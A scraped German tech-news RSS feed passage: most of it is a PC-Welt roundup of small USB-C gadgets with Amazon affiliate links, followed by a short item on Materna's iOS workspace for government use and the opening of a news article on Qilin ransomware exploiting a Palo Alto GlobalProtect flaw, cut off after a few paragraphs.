<p>Wenn Ihr Laptop über einen USB-C-Anschluss verfügt, Sie Ihren Monitor aber schon seit Ewigkeiten nicht mehr geupgradet haben, verfügt Ihr Bildschirm vermutlich nicht über einen Typ-C-Anschluss. Dieser <a href="https://www.amazon.de/dp/B07THJGZ9Z?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Adapter von Anker</a> löst dieses Problem für Sie, sodass Sie das normale HDMI-Kabel, das Sie an Ihren Monitor anschließen, mit diesem Gerät verbinden können.</p>



<p>Der Adapter unterstützt Auflösungen von bis zu 4K bei 60 Hz, was ziemlich beeindruckend ist. Dies ist auch eine raffinierte Möglichkeit, Ihr Smartphone oder Tablet an Ihren Monitor oder Fernseher anzuschließen. Das Gerät kostet circa 13 Euro, aber wir haben es schon für nur 13 Euro bei Amazon gesehen.</p>



<h2 class="wp-block-heading">Mini-Schraubendreher</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b80071"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/image_41cdff.png?w=1200" alt="USB C Mini Schraubendreher" class="wp-image-2906096" width="1200" height="1126" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Amazon</p></div>



<p>Wenn Sie häufig an Ihrem Computer oder anderen Geräten herumschrauben müssen, ist dieser <a href="https://www.amazon.de/Mini-Elektrisch-Schraubendreher-Set-Screwdriver/dp/B0D47CS4TD/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">elektrische Mini-Schraubendreher</a> vielleicht genau das Richtige für Sie. Dieser stiftförmige Schraubendreher verfügt über vier LED-Leuchten, damit Sie besser sehen können, woran Sie gerade arbeiten, und dreht sich 200 Mal pro Minute, sodass Sie die Arbeit schneller erledigen können.</p>



<p>Der Schraubendreher verfügt über 64 verschiedene Aufsätze, es sollte also für so gut wie jeden Einsatzzweck ein passender dabei sein. Er kann über USB-C aufgeladen werden und hält bis zu drei Stunden lang. Der Elektroschraubendreher kostet normalerweise 41 Euro, ist aber auch für 32 Euro im Angebot erhältlich.</p>



<h2 class="wp-block-heading">USB-C microSD-Kartenleser</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b80af6"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/image_491207.png" alt="USB C microSD Kartenleser Ugreen" class="wp-image-2858705" width="1135" height="1009" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Ugreen / Amazon</p></div>



<p>Die meisten Laptops verfügen heutzutage nicht mehr über einen Kartenleser, daher muss man andere Wege finden, um Daten von diesen kleinen Dingern zu übertragen. Egal, ob Sie Daten von der Karte Ihrer Dashcam oder Ihrer Kamera übertragen möchten, dieser winzige <a href="https://www.amazon.de/UGREEN-Kartenleser-Aluminium-Kartenleseger%C3%A4t-kompatibel/dp/B08CS8T8DC/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Ugreen USB-C microSD-Kartenleser</a> ist dafür bestens geeignet.</p>



<p>Der Kartenleser ist so klein, dass Sie ihn wahrscheinlich an einem Schlüsselbund befestigen können. Wenn Sie eine etwas vielseitigere Version bevorzugen, bietet <a href="https://www.amazon.de/dp/B07D1J88CF?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Ugreen ein Modell an, das auch mit SD-Karten kompatibel ist</a> und sowohl über USB-C- als auch USB-A-Anschlüsse verfügt. Alle diese Modelle kosten weniger als 10 Euro und sind daher eine lohnende Investition.</p>



<h2 class="wp-block-heading">Anker Nano Power Bank</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b818ab"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/03/Anker-Nano-Powerbank-5000mAh.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Anker Nano Powerbank, 5000mAh" class="wp-image-2640989" width="1200" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Anker </p></div>



<p>Eine Sache, die Sie unbedingt in Ihrer Tasche, Reisetasche oder in Ihrem Rucksack haben müssen, ist eine <a href="https://www.pcwelt.de/article/1167895/vergleich-die-besten-powerbanks-im-test-4500-bis-30000-mah.html" target="_blank" rel="noreferrer noopener">Powerbank</a>. Denn man weiß schließlich nie, wann das Telefon einen mal im Stich lässt und nach einer Aufladung schreit. Die <a href="https://www.amazon.de/Anker-Powerbank-Integrierter-Faltbarer-Kompatibel/dp/B0C6XK77HJ/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Anker Nano Power Bank</a> ist zum Glück so klein, dass sie fast überall hinpasst.</p>



<p>Sie verfügt über einen faltbaren USB-C-Anschluss und einen Anschluss an der Seite, sodass Sie bei Bedarf zwei Geräte gleichzeitig aufladen können. Die Kapazität von 5.000 mAh reicht gerade aus, um Ihr Handy einmal vollständig aufzuladen, was in der Not entscheidend sein kann. Außerdem kostet sie gerade mal 26 Euro, ist aber immer wieder mal reduziert.</p>



<h2 class="wp-block-heading">Endoskopkamera mit Licht</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b825b1"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/Endoscope-Camera-with-Light.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Ennovor Endoscope camera " class="wp-image-2779926" width="1200" height="750" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Ennovor</p></div>



<p>Auch wenn Sie diese <a href="https://www.amazon.de/Endoskopkamera-Ennovor-Wasserdicht-Inspektionskamera-Rohrkamera/dp/B0DFM6RFHR/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Endoskopkamera von Ennovor</a> nicht jeden Tag benutzen werden, kann sie doch sehr nützlich sein. Sie schließen sie einfach an Ihr Telefon an, installieren eine App und sehen alles, was Ihre Kamera macht. <a href="https://www.pcwelt.de/article/2771668/dieses-geniale-tool-kostet-weniger-als-19-euro-und-erleichtert-mir-jede-woche-das-leben.html" target="_blank" rel="noreferrer noopener">Mein Kollege schwört darauf</a> und verwendet sie, um alles zu finden, was so hinter dem Schreibtisch verloren geht.</p>



<p>Gerade dann, wenn Sie am Auto arbeiten oder nach undichten Leitungen suchen, ist das Teil super nützlich. Da sie die Schutzklasse IP67 hat, können Sie sie sogar in Ihr Aquarium stellen. Die Kamera wird mit einem circa 5 Meter langen, halbstarren Kabel und diversem Zubehör geliefert, darunter ein Haken, ein Magnet und ein Spiegel. Sie können diese Kamera im Moment für um die 22 Euro kaufen.</p>



<h2 class="wp-block-heading">Blukar Taschenlampe</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b8336b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/Blukar-flash-light.jpg?quality=50&amp;strip=all" alt="Blukar rechargeable flashlight" class="wp-image-2779875" width="1045" height="653" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Blukar</p></div>



<p>Egal, wer Sie sind oder wo Sie so unterwegs sind: Sie brauchen eine Taschenlampe. Je kleiner, desto besser, denn so können Sie sie in jede Tasche stecken. <a href="https://www.amazon.de/Blukar-Taschenlampe-Superhelle-Betriebsdauer-Wasserdichte/dp/B0B42R2GKP/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Dieses Modell von Blukar</a> verfügt über einen eingebauten 1800mAh-Akku, den Sie mit einem der vielen Typ-C-Kabel aufladen, die Sie so herumliegen haben.</p>



<p>Mit einer einzigen Ladung können Sie bis zu 16 Stunden arbeiten, was ziemlich gut ist. Sie können zwischen vier verschiedenen Blitzmodi wählen, darunter auch einer, der Ihnen hilft, Hilfe zu signalisieren. Außerdem kostet die kleine Taschenlampe weniger als 10 Euro. Es gibt also keine Ausrede, sich diesen Tipp entgehen zu lassen.</p>



<h2 class="wp-block-heading">Samsung Flash-Laufwerk</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b83f55"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/08/Samsung-USB-Type-C-flash-drive-product-promo.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung USB Type-C flash drive product promo" class="wp-image-2441089" width="1200" height="800" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Samsung</p></div>



<p>Die allermeisten Flash-Laufwerke haben einen USB-A-Anschluss, aber <a href="https://www.amazon.de/Samsung-Type-CTM-Flash-MUF-256DA-APC/dp/B09R2CF1K2/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">dieses von Samsung</a> besitzt einen Typ-C-Anschluss. Mit Übertragungsgeschwindigkeiten von bis zu 400 MB/s können Sie Dateien im Handumdrehen verschieben. Das Coole an diesem USB-Stick ist, dass Sie ihn sogar in Ihr Smartphone stecken können, um 4K-Videos direkt darauf aufzunehmen.</p>



<p>Das Samsung Type-C Flash-Laufwerk ist in verschiedenen Speicheroptionen erhältlich, angefangen bei 64 GB bis hin zu 512 GB.</p>



<h2 class="wp-block-heading">Mini Luftpumpe</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b84b10"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/PC-Welt-Aufmacher-60.jpg?quality=50&amp;strip=all" alt="CYCPLUS Luftpumpe I50PSI Elektrischer Kompressor Tragbar Fahrradpumpe Mini Reifenpumpe mit Digital LED Anzeige LED Licht Wiederaufladbarer Li-ionen 12V für alle Fahrräder Motorräder und Autos Amazon Angebot" class="wp-image-2377338" width="1200" height="800" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PCWelt/Cycplus/Amazon</p></div>



<p>Ebenfalls perfekt für den Sommer geeignet ist diese <a href="https://www.amazon.de/dp/B08QMJSHDG?th=1&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">kleine Luftpumpe von Cycplus</a>, die unterwegs in jede Tasche passt. Sie kann nicht nur einen Fahrradreifen innerhalb von zwei Minuten auf Knopfdruck wieder aufpumpen, sondern wird auch per USB aufgeladen. Sie eignet sich laut Hersteller für Mountainbikes, Rennräder, Motorräder und sogar Autos!</p>



<p>Neben der Luftpumpe selbst lässt sich dieses praktische Gadget auch als Taschenlampe oder Powerbank für unterwegs einsetzen. Alles Dinge, die man auf einer Fahrradtour sehr gut gebrauchen kann. Und für den Preis von nur 45,99 Euro wirklich empfehlenswert, wenn Sie schnelle Hilfe bei platten Reifen benötigen. Im Angebot kostet sie sogar nur 37 Euro.</p>



<h2 class="wp-block-heading">Leselampe mit Buchklemme</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b85712"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/image_92cd0c.png?w=1200" alt="" class="wp-image-2796038" width="1200" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Gritin / Amazon</p></div>



<p>Wer auch gerne und viel liest, und das teilweise bis spät in die Nacht hinein, wird sich über dieses kleine Teil hier freuen: eine Leselampe, die Sie einfach an Ihr Buch klemmen können. Das ist jetzt vielleicht nichts bahnbrechend Neues, doch mit insgesamt drei Farbtemperaturen und fünf verschiedenen Lichtmodi können Sie individuell anpassen, wie viel Licht Sie zum Lesen brauchen. </p>



<p>Die <a href="https://www.amazon.de/Gritin-Farbtemperatur-Helligkeit-Wiederaufladbare-Klemmlampe/dp/B0CBPL4RKH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Leselampe von Gritin</a> kostet bei Amazon gerade mal 13 Euro und besitzt einen 1200-mAh-Akku, der je nach Nutzung bis zu 80 Stunden durchhält. Danach können Sie ihn einfach per USB wieder aufladen. Den Hals der Lampe können Sie nach Belieben hin- und herschwenken, und es gibt sogar eine kleine Ladeanzeige. Was will man mehr?</p>



<h2 class="wp-block-heading">Externes DVD-Laufwerk</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b86613"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/Amicool-external-CD-DVD-drive-deal.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Amicool external CD DVD drive deal" class="wp-image-2864860" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Amicool</p></div>



<p>Wenn Ihr Laptop wie viele heutzutage kein DVD-Laufwerk besitzt, dann wird Ihnen dieses kleine Gerät sehr nützlich sein. Dieses <a href="https://www.amazon.de/dp/B07V67STBD?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">externe DVD-Laufwerk von Amicool </a>wird über USB-C (oder USB-A) an Ihren Laptop angeschlossen und bietet Ihnen das optische Laufwerk, das Sie manchmal benötigen.</p>



<p>Es kann DVDs und CDs problemlos lesen und brennen, sodass Sie Software installieren, Dateien kopieren, Daten sichern, Spiele spielen und vieles mehr können. Sie müssen nicht einmal Treiber installieren, da dieses Gerät Plug-and-Play-fähig ist. Normalerweise kostet es 28 Euro, aber oft ist es schon für etwa 20 Euro zu haben, was ein absolutes Schnäppchen ist.</p>



<h2 class="wp-block-heading">Wiederaufladbare Handwärmer</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b87298"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Handwarmer_USBC_Gadget.jpg?quality=50&amp;strip=all" alt="Handwärmer USB Gadget" class="wp-image-3198531" width="1097" height="930" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Amazon / PC-WELT </p></div>



<p>Wenn es langsam wieder kälter wird, wünscht man sich oft nichts sehnlicher, als seine Hände etwas schneller aufwärmen zu können. Das geht natürlich auch mit Handschuhen oder einer Tasse Tee, doch <a href="https://www.amazon.de/Handw%C3%A4rmer-wiederaufladbar-elektrische-Taschenheizung-W%C3%A4rme-Therapie/dp/B0CJYBXMXH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">diese Handwärmer für 20 Euro</a> sind nicht nur wiederaufladbar, sondern halten Ihre Finger mit einer einzigen Ladung auch bis zu 24 Stunden lang warm.</p>



<p>Die beiden Gadgets verfügen über einen Temperatursensor-Chip, mit dem Sie eine von drei Temperaturen für eine präzise Steuerung auswählen können. Außerdem stehen verschiedene Farben zur Auswahl, wodurch sie sich auch bestens als Geschenk eignen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WorkSPACE für indigo nativ auf iPhone und iPad]]></title>
<description><![CDATA[Materna Virtual Solution stellt mit „WorkSPACE für indigo“ eine native Arbeitsumgebung für iPhone und iPad vor. Die Lösung soll Behörden einen VS-NfD-konformen mobilen Arbeitsplatz bereitstellen und setzt auf das indigo-Sicherheitskonzept von Apple statt auf klassische Container-Ansätze.]]></description>
<link>https://tsecurity.de/de/3690908/it-security-nachrichten/workspace-fuer-indigo-nativ-auf-iphone-und-ipad/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690908/it-security-nachrichten/workspace-fuer-indigo-nativ-auf-iphone-und-ipad/</guid>
<pubDate>Fri, 24 Jul 2026 09:21:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Materna Virtual Solution stellt mit „WorkSPACE für indigo“ eine native Arbeitsumgebung für iPhone und iPad vor. Die Lösung soll Behörden einen VS-NfD-konformen mobilen Arbeitsplatz bereitstellen und setzt auf das indigo-Sicherheitskonzept von Apple statt auf klassische Container-Ansätze.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware groups are hammering your vulnerable VPNs]]></title>
<description><![CDATA[Cybercriminals are actively exploiting a recently discovered vulnerability in Palo Alto Networks firewall and VPN appliances to deploy the Qilin ransomware strain.



A critical authentication bypass flaw (CVE-2026-0257) in Palo Alto GlobalProtect portal and gateway was the common link in a serie...]]></description>
<link>https://tsecurity.de/de/3690892/it-security-nachrichten/ransomware-groups-are-hammering-your-vulnerable-vpns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690892/it-security-nachrichten/ransomware-groups-are-hammering-your-vulnerable-vpns/</guid>
<pubDate>Fri, 24 Jul 2026 09:10:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Cybercriminals are actively exploiting a recently discovered vulnerability in Palo Alto Networks firewall and VPN appliances to deploy the Qilin <a href="https://www.csoonline.com/article/563507/what-is-ransomware-how-it-works-and-how-to-remove-it.html">ransomware</a> strain.</p>



<p class="wp-block-paragraph">A critical authentication bypass flaw (<a href="https://nvd.nist.gov/vuln/detail/cve-2026-0257">CVE-2026-0257</a>) in Palo Alto GlobalProtect portal and gateway was the common link in a series of intrusions in June, Arctic Wolf Labs warns. Exploitation of the vulnerability <a href="https://www.csoonline.com/article/4179847/attackers-exploit-palo-alto-globalprotect-flaw-days-after-disclosure.html">came within days of disclosure</a>.</p>



<p class="wp-block-paragraph">“Post-exploitation tradecraft varied across intrusions, from rapid encryption-only operations to full double-extortion, possibly suggesting multiple affiliates operating under the Qilin ransomware-as-a-service (RaaS) umbrella,” Arctic Wolf’s researchers <a href="https://arcticwolf.com/resources/blog/exploitation-of-cve-2026-0257-leads-to-qilin-ransomware/">wrote in a post on the threat</a>.</p>



<p class="wp-block-paragraph">The campaign against Palo Alto’s VPN client is part of a rising trend that sees ransomware groups increasingly targeting vulnerabilities in network edge tools and devices.</p>



<h2 class="wp-block-heading">Ransomware takes aim at the edge</h2>



<p class="wp-block-paragraph">Beyond GlobalProtect, <a href="https://www.csoonline.com/article/4079316/cross-platform-ransomware-qilin-weaponizes-linux-binaries-against-windows-hosts.html">Qilin</a> — the most active threat group in Q2 2026, responsible for 14% of attacks, according to <a href="https://www.nccgroup.com/resource-hub/cyber-threat-intelligence-reports/">NCC Group’s latest Quarterly Cyber Threat Intelligence Report</a> —  has also targeted flaws in Fortinet’s FortiGate, Citrix NetScaler, and Check Point Remote Access VPN.</p>



